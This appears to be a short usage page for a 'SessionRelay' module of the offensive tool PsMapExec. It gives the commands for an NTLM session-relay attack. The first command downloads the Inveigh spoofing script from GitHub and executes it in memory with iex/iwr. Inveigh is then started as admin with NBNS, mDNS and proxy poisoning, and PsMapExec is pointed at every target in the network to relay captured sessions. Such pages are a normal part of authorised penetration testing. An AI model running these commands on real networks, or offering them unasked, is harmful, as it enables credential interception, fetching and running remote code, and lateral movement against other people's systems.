SessionRelay
SessionRelay
Usage
Load Inveigh into memory
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1)Execute Inveigh (as admin), ensuring to specify the current systems IP address
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y -IP 10.10.10.7Run PsMapExec, ensuring -ListenerIP is set to the same IP address as above.
PsMapExec [Method] -Targets all -Module sessionrelay -ListenerIP 10.10.10.7Optional Parameters
1) Displays each targets output to the console
-ShowOutput2) Display only successful results
Supported Methods
Last updated